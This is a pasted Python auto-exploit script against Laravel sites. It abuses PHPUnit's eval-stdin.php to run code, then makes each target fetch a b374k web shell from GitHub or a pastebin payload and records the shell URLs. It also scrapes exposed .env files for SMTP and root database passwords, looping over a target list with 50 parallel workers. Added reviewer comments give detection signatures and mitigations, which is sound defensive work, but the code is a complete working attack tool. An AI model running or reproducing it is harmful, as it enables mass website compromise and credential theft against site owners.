l33tb0mb3r

Laravel rce

Mar 3rd, 2020
  1. import requests as r
  2. import sys
  3. import os
  4. from platform import system
  5. import threading
  6. import requests
  7. import random
  8. import datetime
  9. import re
  10. from multiprocessing import Pool
  11. from multiprocessing.dummy import Pool as ThreadPool
  12. from time import time as timer
  13.  
  # Reviewer note: clears the terminal at start-up, using 'clear' when
  # platform.system() reports Linux and 'cls' when it reports Windows.
  # (Indentation was lost in this paste; each os.system call belongs under
  # the if on the line before it.)
  14. if system() == 'Linux':
  15. os.system('clear')
  16. if system() == 'Windows':
  17. os.system('cls')
  18.  
  19.  
  20.  
  21. def rce(url):
  # Reviewer note (defensive reading). Indentation was lost in this paste, so
  # the nesting of the branches below is inferred from statement order.
  #
  # What the code does: sends a GET request whose body is PHP source to
  # <url>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php. If the reply
  # contains 'Linux', the reply and the URL are appended to phpunitvuln.txt and
  # a second request carries a payload that runs wget to save a b374k web shell
  # as unit.php. The script then requests unit.php?ngacengan_su from the same
  # directory as eval-stdin.php and treats the string 'IDBTE4M' in the
  # response as confirmation, appending the shell URL to shell_phpunit.txt.
  # The bare except at the end swallows every error silently.
  #
  # What a defender can look for: access-log entries for
  # .../phpunit/src/Util/PHP/eval-stdin.php (a GET that carries a request body
  # is unusual in itself), requests for unit.php or the ?ngacengan_su query
  # string, a new unit.php under vendor/phpunit/phpunit/src/Util/PHP/, and the
  # web server process making outbound requests to raw.githubusercontent.com.
  #
  # Mitigation: keep PHPUnit and other development dependencies out of
  # production (composer install --no-dev), run a patched PHPUnit release,
  # serve only the application's public/ directory so vendor/ is not reachable
  # over HTTP, and restrict outbound traffic from web servers. A host where
  # unit.php is present should be handled as compromised.
  22. try:
  23. cekos = '<?php echo php_uname("a"); ?>'
  24. upshell = '<?php system("wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O unit.php"); ?>'
  25. url = url.strip()
  26. cek = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=cekos, timeout=50)
  27. if 'Linux' in cek.text:
  28. print("[os] " + cek.text)
  29. open('phpunitvuln.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'+'\n')
  30. r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=upshell)
  31. cekshell = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su')
  32. if 'IDBTE4M' in cekshell.text:
  33. print("[Shell Uploaded] " + url+'/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su')
  34. open('shell_phpunit.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su'+'\n')
  35. else:
  36. print("[Shell not Uploaded] : " + cekshell)
  37. else:
  38. print("[Not Vuln] : " + url)
  39. except:
  40. pass
  41.  
  42. def rce2(url):
  # Reviewer note (defensive reading). Indentation was lost in this paste, so
  # the nesting of the branches below is inferred from statement order.
  #
  # What the code does: same request sequence as rce() against
  # <url>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, but the second
  # payload uses fopen/fwrite with file_get_contents to copy the content of a
  # pastebin.com raw URL into raimu.php. Success is again judged by the string
  # 'IDBTE4M' in the response to raimu.php?ngacengan_su, and results are
  # appended to phpunitvuln.txt and shell_phpunit2.txt. The bare except
  # swallows every error silently.
  #
  # What a defender can look for: the eval-stdin.php requests described for
  # rce(), requests for raimu.php or the ?ngacengan_su query string, a new
  # raimu.php under vendor/phpunit/phpunit/src/Util/PHP/, and the web server
  # process making outbound requests to pastebin.com.
  #
  # Mitigation: the same as for rce(): no development dependencies in
  # production, vendor/ not reachable over HTTP, egress filtering on web
  # servers. Disabling allow_url_fopen removes the remote fetch this payload
  # relies on, but not the underlying code execution.
  43. try:
  44. cekos = '<?php echo php_uname("a"); ?>'
  45. upshell = '<?php fwrite(fopen("raimu.php","w+"),file_get_contents("https://pastebin.com/raw/DWAYZwk5")); ?>'
  46. url = url.strip()
  47. cek = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=cekos, timeout=50)
  48. if 'Linux' in cek.text:
  49. print("[os] " + cek.text)
  50. open('phpunitvuln.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'+'\n')
  51. r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=upshell)
  52. cekshell = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su')
  53. if 'IDBTE4M' in cekshell.text:
  54. print("[Shell Uploaded] " + url+'/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su')
  55. open('shell_phpunit2.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su'+'\n')
  56. else:
  57. print("[Shell not Uploaded] : " + url)
  58. else:
  59. print("[Not Vuln] : " + url)
  60. except:
  61. pass
  62.  
  63. def getsmtp(url):
  # Reviewer note (defensive reading). Indentation was lost in this paste, so
  # the nesting of the branches below is inferred and should be confirmed
  # against a copy that still has its whitespace.
  #
  # What the code does: requests <url>/.env with the browser-like headers
  # defined below. When the body contains APP_NAME the URL is appended to
  # envfound.txt. The code then extracts MAIL_* or SMTP_* host, port,
  # username, password and encryption values from the body with regular
  # expressions, prints them, and appends them to SMTP.txt unless the list of
  # extracted hosts contains exactly smtp.mailtrap.io, localhost or null. A
  # branch keyed on DB_USERNAME=root appends the database username and
  # password to VPS.txt. The same extraction is written out once for status
  # 200 and once for status 302. The bare except swallows every error.
  #
  # What a defender can look for: GET /.env in access logs. The User-Agent
  # below is a usable signature because it carries the misspellings
  # "Mozlila", "Bulid" and "Moblie".
  #
  # Mitigation: deny web access to dotfiles and serve only the application's
  # public/ directory. If .env was ever retrievable, rotate the mail, database
  # and application secrets stored in it; removing the file from view does not
  # undo an earlier read.
  64.  
  65. try:
  66. eNv = "{}/.env".format(url)
  67.  
  68. headers = {
  69. 'Connection': 'keep-alive',
  70. 'Cache-Control': 'max-age=0',
  71. 'Upgrade-Insecure-Requests': '1',
  72. 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
  73. 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  74. 'Accept-Encoding': 'gzip, deflate',
  75. 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
  76. }
  77.  
  78. rsmTP = requests.get(eNv, headers=headers, allow_redirects=True, timeout=50)
  79.  
  80. if "mailtrap.io" in rsmTP.text:
  81.  
  82. print("\033[1;31;40m")
  83.  
  84. print("[ - ] NOT FOUND SMTP [ - ] \n")
  85.  
  86. elif rsmTP.status_code == 200:
  87.  
  88. if "APP_NAME" in rsmTP.text:
  89.  
  90. open('envfound.txt', 'a').write(eNv + '\n')
  91.  
  92. print("\033[1;32;40m")
  93.  
  94. if "MAIL_HOST" in rsmTP.text:
  95.  
  96. SMTP = re.findall('MAIL_HOST=(.*)', rsmTP.text)
  97.  
  98. PORT = re.findall('MAIL_PORT=(.*)', rsmTP.text)
  99.  
  100. USERNAME = re.findall('MAIL_USERNAME=(.*)', rsmTP.text)
  101.  
  102. PASSWORD = re.findall('MAIL_PASSWORD=(.*)', rsmTP.text)
  103.  
  104. MENCRYPTION = re.findall('MAIL_ENCRYPTION=(.*)', rsmTP.text)
  105.  
  106. if "smtp.mailtrap.io" in SMTP:
  107.  
  108. print("\033[1;31;40m")
  109.  
  110. print("[ - ] NOT FOUND SMTP [ - ] \n")
  111.  
  112. elif "localhost" in SMTP:
  113.  
  114. print("\033[1;31;40m")
  115.  
  116. print("[ - ] NOT FOUND SMTP [ - ] \n")
  117.  
  118. elif "null" in SMTP:
  119.  
  120. print("\033[1;31;40m")
  121.  
  122. print("[ - ] NOT FOUND SMTP [ - ] \n")
  123.  
  124. else:
  125.  
  126. print("[ + ] FOUND SMTP [ + ]")
  127.  
  128. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  129.  
  130. print("SMTP HOST => {}".format(SMTP[0]))
  131.  
  132. print("SMTP PORT => {}".format(PORT[0]))
  133.  
  134. print("SMTP USERNAME => {}".format(USERNAME[0]))
  135.  
  136. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  137.  
  138. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  139.  
  140. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  141.  
  142. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\n')
  143.  
  144.  
  145.  
  146. elif "SMTP_HOST" in rsmTP.text:
  147.  
  148. SMTP = re.findall('SMTP_HOST=(.*)', rsmTP.text)
  149.  
  150. PORT = re.findall('SMTP_PORT=(.*)', rsmTP.text)
  151.  
  152. USERNAME = re.findall('SMTP_USERNAME=(.*)', rsmTP.text)
  153.  
  154. PASSWORD = re.findall('SMTP_PASSWORD=(.*)', rsmTP.text)
  155.  
  156. MENCRYPTION = re.findall('SMTP_ENCRYPTION=(.*)', rsmTP.text)
  157.  
  158. if "smtp.mailtrap.io" in SMTP:
  159.  
  160. print("\033[1;31;40m")
  161.  
  162. print("[ - ] NOT FOUND SMTP [ - ] \n")
  163.  
  164. elif "localhost" in SMTP:
  165.  
  166. print("\033[1;31;40m")
  167.  
  168. print("[ - ] NOT FOUND SMTP [ - ] \n")
  169.  
  170. elif "null" in SMTP:
  171.  
  172. print("\033[1;31;40m")
  173.  
  174. print("[ - ] NOT FOUND SMTP [ - ] \n")
  175.  
  176. else:
  177.  
  178. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  179.  
  180. print("SMTP HOST => {}".format(SMTP[0]))
  181.  
  182. print("SMTP PORT => {}".format(PORT[0]))
  183.  
  184. print("SMTP USERNAME => {}".format(USERNAME[0]))
  185.  
  186. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  187.  
  188. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  189.  
  190. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  191.  
  192. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\n')
  193.  
  194. elif "mailtrap.io" in rsmTP.text:
  195.  
  196. print("\033[1;31;40m")
  197.  
  198. print("[ - ] NOT FOUND SMTP [ - ] \n")
  199.  
  200. elif "DB_USERNAME=root" in rsmTP.text:
  201.  
  202. ROOTU = re.findall('DB_USERNAME=(.*)', rsmTP.text)
  203.  
  204. ROOTP = re.findall('DB_PASSWORD=(.*)', rsmTP.text)
  205.  
  206. print("[ + ] Maybe you can get VPS / DATABASE [+]")
  207.  
  208. open('VPS.txt', 'a').write('HOSTS : ' + url + '\nUSERNAME : ' + ROOTU[0] + '\nPASSWORD : ' + ROOTP[0] + '\n')
  209.  
  210.  
  211.  
  212. elif rsmTP.status_code == 302:
  213.  
  214. if "APP_NAME" in rsmTP.text:
  215.  
  216. open('envfound.txt', 'a').write(eNv + '\n')
  217.  
  218. if "MAIL_HOST" in rsmTP.text:
  219.  
  220. SMTP = re.findall('MAIL_HOST=(.*)', rsmTP.text)
  221.  
  222. PORT = re.findall('MAIL_PORT=(.*)', rsmTP.text)
  223.  
  224. USERNAME = re.findall('MAIL_USERNAME=(.*)', rsmTP.text)
  225.  
  226. PASSWORD = re.findall('MAIL_PASSWORD=(.*)', rsmTP.text)
  227.  
  228. MENCRYPTION = re.findall('MAIL_ENCRYPTION=(.*)', rsmTP.text)
  229.  
  230. if "smtp.mailtrap.io" in SMTP:
  231.  
  232. print("\033[1;31;40m")
  233.  
  234. print("[ - ] NOT FOUND SMTP [ - ] \n")
  235.  
  236. elif "localhost" in SMTP:
  237.  
  238. print("\033[1;31;40m")
  239.  
  240. print("[ - ] NOT FOUND SMTP [ - ] \n")
  241.  
  242. elif "null" in SMTP:
  243.  
  244. print("\033[1;31;40m")
  245.  
  246. print("[ - ] NOT FOUND SMTP [ - ] \n")
  247.  
  248. else:
  249.  
  250. print("[ + ] FOUND SMTP [ + ]")
  251.  
  252. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  253.  
  254. print("SMTP HOST => {}".format(SMTP[0]))
  255.  
  256. print("SMTP PORT => {}".format(PORT[0]))
  257.  
  258. print("SMTP USERNAME => {}".format(USERNAME[0]))
  259.  
  260. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  261.  
  262. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  263.  
  264. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  265.  
  266. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\n')
  267.  
  268.  
  269.  
  270.  
  271. elif "SMTP_HOST" in rsmTP.text:
  272.  
  273. SMTP = re.findall('SMTP_HOST=(.*)', rsmTP.text)
  274.  
  275. PORT = re.findall('SMTP_PORT=(.*)', rsmTP.text)
  276.  
  277. USERNAME = re.findall('SMTP_USERNAME=(.*)', rsmTP.text)
  278.  
  279. PASSWORD = re.findall('SMTP_PASSWORD=(.*)', rsmTP.text)
  280.  
  281. MENCRYPTION = re.findall('SMTP_ENCRYPTION=(.*)', rsmTP.text)
  282.  
  283. if "smtp.mailtrap.io" in SMTP:
  284.  
  285. print("\033[1;31;40m")
  286.  
  287. print("[ - ] NOT FOUND SMTP [ - ] \n")
  288.  
  289. elif "localhost" in SMTP:
  290.  
  291. print("\033[1;31;40m")
  292.  
  293. print("[ - ] NOT FOUND SMTP [ - ] \n")
  294.  
  295. elif "null" in SMTP:
  296.  
  297. print("\033[1;31;40m")
  298.  
  299. print("[ - ] NOT FOUND SMTP [ - ] \n")
  300.  
  301. else:
  302.  
  303. print("[ + ] FOUND SMTP [ + ]")
  304.  
  305. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  306.  
  307. print("SMTP HOST => {}".format(SMTP[0]))
  308.  
  309. print("SMTP PORT => {}".format(PORT[0]))
  310.  
  311. print("SMTP USERNAME => {}".format(USERNAME[0]))
  312.  
  313. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  314.  
  315. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  316.  
  317. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  318.  
  319. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP PORT : ' + PORT[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\nSMTP ENCRYPTION : ' + MENCRYPTION[0] + '\n')
  320.  
  321.  
  322. elif "DB_USERNAME=root" in rsmTP.text:
  323.  
  324. ROOTU = re.findall('DB_USERNAME=(.*)', rsmTP.text)
  325.  
  326. ROOTP = re.findall('DB_PASSWORD=(.*)', rsmTP.text)
  327.  
  328. print("[ + ] Maybe you can get VPS / DATABASE [+]")
  329.  
  330. open('VPS.txt', 'a').write('HOSTS : ' + url + '\nUSERNAME : ' + ROOTU[0] + '\nPASSWORD : ' + ROOTP[0] + '\n')
  331.  
  332. else:
  333.  
  334. print("[ - ] CAN'T FOUND BUG [ - ]")
  335.  
  336. except:
  337.  
  338. pass
  339. def robot(url):
  # Reviewer note: per-target driver. Calls rce(), rce2() and getsmtp() in that
  # order for one URL, so a single target sees the eval-stdin.php probes
  # followed by the /.env request. The bare except swallows any error.
  340. try:
  341. rce(url)
  342. rce2(url)
  343. getsmtp(url)
  344. except:
  345. pass
  346.  
  347. def main():
  # Reviewer note: reads every line of the file named in sys.argv[1] as a
  # target URL and maps robot() over them with Pool(50). Pool is the name
  # imported from multiprocessing at the top of the file; the assignment to
  # ThreadPool here only rebinds that name inside this function.
  # For defenders this means the requests arrive as parallel bursts from one
  # source rather than as a slow sequential scan. The bare except swallows any
  # error.
  348. list = open(sys.argv[1], 'r').readlines()
  349. try:
  350. ThreadPool = Pool(50)
  351. ThreadPool.map(robot, list)
  352. except:
  353. pass
  # Reviewer note: script entry guard. With no command-line argument it prints
  # the banner and a usage line; otherwise it calls main(), which takes the
  # target list path from sys.argv[1].
  354. if __name__ == "__main__":
  355. if len(sys.argv) < 2:
  356. print("Auto Exploit Laravel by Fallaga Team respect all hacker from TN, PK ,DZ")
  357. print("Usage : python " + sys.argv[0] + " list.txt")
  358. else:
  359. main()